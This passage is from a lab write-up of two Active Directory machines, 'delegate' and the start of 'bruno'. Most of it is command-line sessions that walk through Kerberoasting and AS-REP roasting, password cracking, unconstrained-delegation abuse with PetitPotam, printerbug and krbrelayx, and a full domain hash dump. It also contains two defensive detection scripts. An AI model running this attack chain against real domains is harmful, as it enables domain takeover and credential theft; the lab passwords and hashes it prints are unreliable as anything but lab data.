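        if ev["id"] == 5136 and ev.get("attribute", "").lower() == "serviceprincipalname":
            spn_writes[_cn(ev["object"]).lower()] = (when, ev["subject"])
        elif ev["id"] == 4769 and ev["etype"] == RC4_HMAC and not ev["service"].endswith("$"):
            # computer accounts ($) have random 120-char passwords; user accounts are the crackable ones
            prior = spn_writes.get(ev["service"].lower())
            if prior and when - prior[0] <= window:
                delta = int((when - prior[0]).total_seconds())
                findings.append((ev["service"], "high",
                                 f"SPN written by {prior[1]} {delta}s before an RC4 TGS request by {ev['account']}"))
            else:
                findings.append((ev["service"], "medium",
                                 f"RC4 TGS request for a user account by {ev['account']}"))
    return findings


if __name__ == "__main__":
    for svc, sev, why in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(f"[{sev}] {svc}: {why}")
```

The "medium" path on its own is noisy in domains that still allow RC4; the 5136 correlation is what turns it into an alert worth paging on, and it also names the account whose GenericWrite was abused.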

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast                                         
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls                       
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
  Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip---
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$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
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ 

....

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt      
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341       (?)     
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq  
SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        dc1.delegate.vl 389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341 
MAQ         dc1.delegate.vl 389    DC1              [*] Getting the MachineAccountQuota
MAQ         dc1.delegate.vl 389    DC1              MachineAccountQuota: 10

.

A new tool, krbrelayx (which ships dnstool.py and printerbug.py):

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git

Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                                                    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate          
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md  venv
                                                                                                                   
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket          
Collecting impacket
  Using cached impacket-0.11.0-py3-none-any.whl
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
                                                                                                                     


.

New tools (bloodyAD.py, addspn.py and PetitPotam.py):

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD              
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..      
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl             
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ 

Below: bloodyAD installed in a Python virtual environment (I had trouble with dependencies).

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
Traceback (most recent call last):
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
    from bloodyAD import main
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
    from .network.config import Config, ConnectionHandler
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
    from bloodyAD.network.ldap import Ldap
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
    from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ 

.

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC 
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

Using Powermad & printerbug. Alternative route: create the machine account with Powermad from the N.Thompson WinRM shell, then coerce the DC with printerbug (MS-RPRN) instead of PetitPotam.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
                                        
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
                                        
Data: 180768 bytes of 180768 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> 
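Both bloodyAD earlier and Powermad here flip the same bit: 528384 is 0x81000, i.e. WORKSTATION_TRUST_ACCOUNT (0x1000) plus TRUSTED_FOR_DELEGATION (0x80000). As an added example (my code, not the write-up's or any of the tools' own), the Python below decodes and composes userAccountControl values and runs the check a defender would: any non-DC account with TRUSTED_FOR_DELEGATION set is a finding. The flag values are the documented ADS_USER_FLAG constants and 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule; the account list is constructed sample data.

```python
from __future__ import annotations

# userAccountControl bits (subset of the documented ADS_USER_FLAG values)
UAC_FLAGS = {
    0x0000002: "ACCOUNTDISABLE",
    0x0000200: "NORMAL_ACCOUNT",
    0x0001000: "WORKSTATION_TRUST_ACCOUNT",       # member server / workstation / new machine account
    0x0002000: "SERVER_TRUST_ACCOUNT",            # domain controller
    0x0080000: "TRUSTED_FOR_DELEGATION",          # unconstrained delegation
    0x0400000: "DONT_REQ_PREAUTH",                # AS-REP roastable
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
}
UAC_BY_NAME = {name: bit for bit, name in UAC_FLAGS.items()}

# OID of the LDAP bitwise-AND matching rule used for userAccountControl filters
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value: int) -> list[str]:
    """Names of the flags set in value, lowest bit first; bits not in the table come back as UNKNOWN(0x..)."""
    names = [UAC_FLAGS[bit] for bit in sorted(UAC_FLAGS) if value & bit]
    known = 0
    for bit in UAC_FLAGS:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(f"UNKNOWN(0x{leftover:x})")
    return names


def encode_uac(names: list[str]) -> int:
    """Compose a userAccountControl value; a misspelled flag raises KeyError instead of being dropped."""
    value = 0
    for name in names:
        value |= UAC_BY_NAME[name]
    return value


def delegation_hunt_filter() -> str:
    """LDAP filter for TRUSTED_FOR_DELEGATION on anything that is not a DC."""
    tfd = UAC_BY_NAME["TRUSTED_FOR_DELEGATION"]
    dc = UAC_BY_NAME["SERVER_TRUST_ACCOUNT"]
    return (f"(&(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={tfd})"
            f"(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={dc})))")


def find_unconstrained_non_dc(accounts: list[dict]) -> list[str]:
    """Same check applied offline to objects already pulled over LDAP."""
    tfd = UAC_BY_NAME["TRUSTED_FOR_DELEGATION"]
    dc = UAC_BY_NAME["SERVER_TRUST_ACCOUNT"]
    return [a["sAMAccountName"] for a in accounts
            if a["userAccountControl"] & tfd and not a["userAccountControl"] & dc]


# Constructed sample (not pulled from the lab): a DC with its default 0x82000, a user with the
# default 0x200, and two machine accounts after TRUSTED_FOR_DELEGATION was flipped on.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC1$",       "userAccountControl": 532480},
    {"sAMAccountName": "N.Thompson", "userAccountControl": 512},
    {"sAMAccountName": "PWNED$",     "userAccountControl": 528384},
    {"sAMAccountName": "UwU$",       "userAccountControl": 528384},
]

if __name__ == "__main__":
    print(decode_uac(528384))                          # ['WORKSTATION_TRUST_ACCOUNT', 'TRUSTED_FOR_DELEGATION']
    print(delegation_hunt_filter())
    print(find_unconstrained_non_dc(SAMPLE_ACCOUNTS))  # ['PWNED$', 'UwU$']
```

Run the string from delegation_hunt_filter() against the domain with ldapsearch to find exactly what this chapter created; DC1$ stays out of the result because SERVER_TRUST_ACCOUNT is set, which is why 532480 is the expected value for a DC and 528384 on a fresh machine account is not.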

Set up the listener and wait for the connection. The "Unsupported MechType NTLMSSP" lines below can be ignored: krbrelayx only needs the Kerberos ticket here, and the DC1$ TGT it saves is the one we use.

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Add a DNS record for PWNED.delegate.vl pointing at the attacker box, then start printerbug

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
 addspn.py  'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'   krbrelayx.py   LICENSE      printerbug.py   venv
 bloodyAD    dnstool.py                                    lib            PetitPotam   README.md
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra

Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

Use impacket-secretsdump with the captured DC1$ TGT (exported via KRB5CCNAME) to dump the hashes.

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist                                                               
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL

Valid starting       Expires              Service principal
06/12/2024 07:13:23  06/12/2024 17:07:36  krbtgt/DELEGATE.VL@DELEGATE.VL
    renew until 06/19/2024 07:07:36
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

.

What a ride.

 

vulnlab-bruno

vulnlab bruno

a hard machine

Tools used : impacket-GetNPUsers , crackmapexec , bloodhound-python , msfvenom ,  impacket-smbclient , KrbRelay.exe ,KrbRelayUp.exe , Rubeus.exe , impacket-ticketConverter , impacket-secretsdump , evil-winrm

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-GetNPUsers bruno.vl/svc_scan -dc-ip 10.10.124.39               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate svc_scan, getting its TGT
$krb5asrep$23$svc_scan@BRUNO.VL:09ca9d7e711a56a1f32bb669a42453f7$4010b699655764a235ad95abe2edf6fd2b368f73aebb7f9fac8fd62152c57ce7d08cb2a8e028ef84323485cda101d51cb4151fc1fdb0a9773bc103647303d0401aabf77c6b4e141786fa7e8e675987b8ece6a6cb947dc7a64825da5d64aa1d4f24a0638ec7b9cc96d64a241e719126cebb8488e92c6c0a9edcdbaff4d0ba71be1c37b76d1dcc3c85f500ae573ee25e5db14fef6eab9e3c55e245c318fc5308ebd54eaa6ebaede68b11601da50cb738df8a53736ab8f5be08b099d797f95067f0741d305500a7f5762e0a088fa9b29d02092a86eef3b53aa575e916007eb089b8da462e9a
                                  
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ john svc_scan.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Sunshine1        ($krb5asrep$23$svc_scan@BRUNO.VL)     
1g 0:00:00:00 DONE 2/3 (2024-06-09 11:01) 16.66g/s 850166p/s 850166c/s 850166C/s Piano..Open
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


 

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec smb bruno.vl -u 'svc_scan' -p 'Sunshine1' --shares
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         brunodc.bruno.vl 445    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
SMB         brunodc.bruno.vl 445    BRUNODC          [+] Enumerated shares
SMB         brunodc.bruno.vl 445    BRUNODC          Share           Permissions     Remark
SMB         brunodc.bruno.vl 445    BRUNODC          -----           -----------     ------
SMB         brunodc.bruno.vl 445    BRUNODC          ADMIN$                          Remote Admin
SMB         brunodc.bruno.vl 445    BRUNODC          C$                              Default share
SMB         brunodc.bruno.vl 445    BRUNODC          CertEnroll      READ            Active Directory Certificate Services share
SMB         brunodc.bruno.vl 445    BRUNODC          IPC$            READ            Remote IPC
SMB         brunodc.bruno.vl 445    BRUNODC          NETLOGON        READ            Logon server share 
SMB         brunodc.bruno.vl 445    BRUNODC          queue           READ,WRITE      
SMB         brunodc.bruno.vl 445    BRUNODC          SYSVOL          READ            Logon server share 
                                                   

Some BloodHound analysis

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ bloodhound-python -d bruno.vl -c all -u 'svc_scan' -p 'Sunshine1' -ns 10.10.84.244      
INFO: Found AD domain: bruno.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: brunodc.bruno.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
